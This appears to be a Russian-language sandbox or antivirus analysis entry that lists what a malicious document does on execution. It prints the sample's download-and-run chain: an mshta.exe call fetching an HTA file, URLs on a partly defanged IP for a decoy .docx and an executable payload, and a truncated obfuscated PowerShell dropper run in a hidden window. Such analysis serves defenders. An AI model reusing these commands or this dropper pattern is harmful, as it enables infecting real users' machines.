Техническая информация
- '<SYSTEM32>\mshta.exe' http://18#.#06.123.76/Defruo.hta
- '%ProgramFiles%\microsoft office\office14\winword.exe' /n "%APPDATA%\Document.docx"
- %APPDATA%\document.docx
- %APPDATA%\~$cument.docx
- '18#.#06.123.76':80
- http://18#.#06.123.76/Defruo.hta
- http://18#.#06.123.76/Document.docx
- http://18#.#06.123.76/Kyssene3.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function vTqhXguMH($ytPyKZbti, $aBPjGNSQkdxlXz){[IO.File]::WriteAllBytes($ytPyKZbti, $aBPjGNSQkdxlXz)};function NvbPeMi($ytPyKZbti){if($ytPyKZbti.EndsWith((PFBvgPm...' (со скрытым окном)